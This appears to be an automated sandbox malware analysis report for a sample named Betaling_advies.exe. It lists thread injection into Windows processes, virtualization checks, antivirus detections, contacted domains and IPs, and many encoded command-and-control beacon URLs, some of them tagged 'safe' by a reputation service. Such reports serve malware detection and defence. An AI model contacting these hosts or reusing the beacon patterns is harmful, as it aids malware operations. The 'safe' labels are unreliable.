APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.dfch18.com 156.241.53.253, 49771, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles 18->33 35 boulderhalle-hamburg.com 81.169.145.150, 49765, 80 STRATOSTRATOAGDE Germany 18->35 37 22 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 colorcpl.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Betaling_advies.exe15%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.colorcpl.exe.4bd7960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          7.2.colorcpl.exe.2972508.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.Betaling_advies.exe.2680000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.Betaling_advies.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.Betaling_advies.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.dfch18.com/hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          https://www.werealestatephotography.com/hw6d/?DnbLu=um0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.kathyscrabhouse.com/hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          www.werealestatephotography.com/hw6d/0%Avira URL Cloudsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJu100%Avira URL Cloudmalware
          http://www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.allwest-originals.com/hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.organicfarmteam.com/hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.osaka-computer.net/hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ladybugtubs.com
          		34.102.136.180
          		truefalse
            		unknown
            www.werealestatephotography.com
            		35.208.69.149
            		truetrue
              		unknown
              allwest-originals.com
              		34.102.136.180
              		truefalse
                		unknown
                boulderhalle-hamburg.com
                		81.169.145.150
                		truetrue
                  		unknown
                  specstrii.com
                  		34.102.136.180
                  		truefalse
                    		unknown
                    osaka-computer.net
                    		107.178.109.19
                    		truetrue
                      		unknown
                      www.carsoncredittx.com
                      		192.155.168.82
                      		truefalse
                        		unknown
                        www.kathyscrabhouse.com
                        		192.187.111.219
                        		truetrue
                          		unknown
                          td-balancer-euw2-6-109.wixdns.net
                          		35.246.6.109
                          		truefalse
                            		unknown
                            parkingpage.namecheap.com
                            		198.54.117.218
                            		truefalse
                              		high
                              www.neutrasystems.com
                              		52.128.23.153
                              		truetrue
                                		unknown
                                www.dfch18.com
                                		156.241.53.253
                                		truetrue
                                  		unknown
                                  www.ladybugtubs.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.boulderhalle-hamburg.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.osaka-computer.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.allwest-originals.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.thenewyorker.computer
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.loanascustomboutique.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.wellalytics.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.themusasoficial.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.specstrii.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.organicfarmteam.com
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.dfch18.com/hw6d/?DnbLu=PD6zFQZ0feRnIFnqRgwh7WYr9HBCLrLQfeEKpwQ3SsDBQ385jeUvmpjltj5zrHZAx7on&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.werealestatephotography.com/hw6d/?DnbLu=um+iqA/SlswPLY/3czDk0wl6oY0PgWYbosSPlOYlzmcZrAL5djGLa7ExvPa80BRt3GVX&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.kathyscrabhouse.com/hw6d/?DnbLu=g+1Vjsk4w8x2RD/Kt8Hxup0r2HreN3Gf6VbT6qUlKeSViUJ1r397pmudv9cb4ekjB+95&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      www.werealestatephotography.com/hw6d/true
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.specstrii.com/hw6d/?DnbLu=IiUUmeNwmzZIwBY6jv8olF4RAcLcRfzkTrlXtYyMQXecYFYW1rp8TEFuPJqz5eLrlk+J&EzuxZl=3fX4qpLxXJufalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.allwest-originals.com/hw6d/?DnbLu=9ueW5jgNjqHYG2FKt2LGoCq6SuP7mnM61J0YxzvwfvA6U9wxZN+9uCYbtAS/FF4JJope&EzuxZl=3fX4qpLxXJufalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.organicfarmteam.com/hw6d/?DnbLu=D7dtfgb1ASpTWXzDTTkBm63TDYSh3Sz8xx3t4TS2wXC5rygslUZX2+E35rBVQjv7JKAU&EzuxZl=3fX4qpLxXJufalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.osaka-computer.net/hw6d/?DnbLu=JJCdylcTzsLZbxD+F44msifm3t5O58VGmPPtm/HjqScxgR1v9JyEBvOVGIsgPNAdlWCx&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJutrue
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.litespeedtech.com/error-pagecolorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://www.werealestatephotography.com/hw6d/?DnbLu=umcolorcpl.exe, 00000007.00000002.911472356.0000000004D52000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.tiro.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.goodfont.co.krexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.carterandcone.comlexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.typography.netDexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://fontfabrik.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.%s.comPAexplorer.exe, 00000004.00000000.655043939.0000000002B50000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		low
                                                                          http://www.fonts.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.sandoll.co.krexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.sakkal.comexplorer.exe, 00000004.00000000.672320729.000000000B976000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            198.54.117.218
                                                                            		parkingpage.namecheap.comUnited States
                                                                            		22612NAMECHEAP-NETUSfalse
                                                                            35.246.6.109
                                                                            		td-balancer-euw2-6-109.wixdns.netUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            52.128.23.153
                                                                            		www.neutrasystems.comUnited States
                                                                            		19324DOSARRESTUStrue
                                                                            192.187.111.219
                                                                            		www.kathyscrabhouse.comUnited States
                                                                            		33387NOCIXUStrue
                                                                            107.178.109.19
                                                                            		osaka-computer.netUnited States
                                                                            		53755IOFLOODUStrue
                                                                            34.102.136.180
                                                                            		ladybugtubs.comUnited States
                                                                            		15169GOOGLEUSfalse
                                                                            81.169.145.150
                                                                            		boulderhalle-hamburg.comGermany
                                                                            		6724STRATOSTRATOAGDEtrue
                                                                            156.241.53.253
                                                                            		www.dfch18.comSeychelles
                                                                            		136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                                            35.208.69.149
                                                                            		www.werealestatephotography.comUnited States
                                                                            		19527GOOGLE-2UStrue

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:383925
                                                                            Start date:08.04.2021
                                                                            Start time:12:36:48
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 28s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:Betaling_advies.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:23
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/3@15/9
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 21.4% (good quality ratio 19.3%)
                                                                            • Quality average: 73.5%
                                                                            • Quality standard deviation: 31.3%
                                                                            HCA Information:
                                                                            • Successful, ratio: 92%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            Show All
                                                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 104.43.139.144, 23.54.113.53, 13.88.21.125, 52.255.188.83, 168.61.161.212, 23.10.249.43, 23.10.249.26, 52.147.198.201, 23.0.174.185, 23.0.174.200, 52.155.217.156, 20.54.26.129
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/383925/sample/Betaling_advies.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            No simulations

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            198.54.117.218PaymentAdvice.exeGet hashmaliciousBrowse
                                                                            • www.enerav.com/c22b/?t8bHuTK=aEhNz1M5MwONSiBn/0vn4w/gCXHJ6jEF3X3HXryAuETgC+Myn95z7x6eSB6DSHN4Cngq&2d=lnvt
                                                                            46578-TR.exeGet hashmaliciousBrowse
                                                                            • www.kevinrsamuels.network/goei/?kfOdRJ=f9uvcKoleaXhAa+Mtcg3NtpkL3OawIA7ZGyED81dVKF6dE9d54Zy+1duc26jKxOfhZ46&jBZx=D8b4q
                                                                            SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                            • www.thehairtransplantliaison.com/qqeq/?UR-TRLn=46HGiVXtvGZ1o457vCIWGWOD0rk7gPAg1COzf9/s39+Y4ChpogYwPMQ24i1sYB9XjSps&P6u=Hb9l0TTXQ4NLhX
                                                                            Swift001_jpg.exeGet hashmaliciousBrowse
                                                                            • www.switcheo.finance/o9st/?KtClV=KhNCudCuas36niPBRfSjyKEtMLkkXOZQHLO8g5q+wgMU/BVTe4XuEXQf7/wtYyCblVuW&t8rL=FrghEXS
                                                                            Payment_png.exeGet hashmaliciousBrowse
                                                                            • www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp
                                                                            9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                            • www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
                                                                            Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                            • www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
                                                                            27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                            • www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
                                                                            Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                                            • www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
                                                                            Fully Executed Contract.xlsxGet hashmaliciousBrowse
                                                                            • www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
                                                                            Inv.exeGet hashmaliciousBrowse
                                                                            • www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
                                                                            IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                            • www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
                                                                            zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                                            • www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
                                                                            InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                                            • www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
                                                                            00278943.xlsxGet hashmaliciousBrowse
                                                                            • www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
                                                                            insz.exeGet hashmaliciousBrowse
                                                                            • www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
                                                                            Invoice Payment Details.exeGet hashmaliciousBrowse
                                                                            • www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
                                                                            order.exeGet hashmaliciousBrowse
                                                                            • www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
                                                                            Z4bamJ91oo.exeGet hashmaliciousBrowse
                                                                            • www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8
                                                                            zISJXAAewo.exeGet hashmaliciousBrowse
                                                                            • www.pnorg.net/jskg/?X2JtLRIH=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&blv=UVIpcz0pIRTp
                                                                            52.128.23.153MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                            • www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
                                                                            50729032021.xlsxGet hashmaliciousBrowse
                                                                            • www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
                                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                            • www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
                                                                            Shipping Documents C1216.exeGet hashmaliciousBrowse
                                                                            • www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
                                                                            9V3LjvhSMb.exeGet hashmaliciousBrowse
                                                                            • www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
                                                                            RDAW-180-47D.exeGet hashmaliciousBrowse
                                                                            • www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
                                                                            gV8xdP8bas.exeGet hashmaliciousBrowse
                                                                            • www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
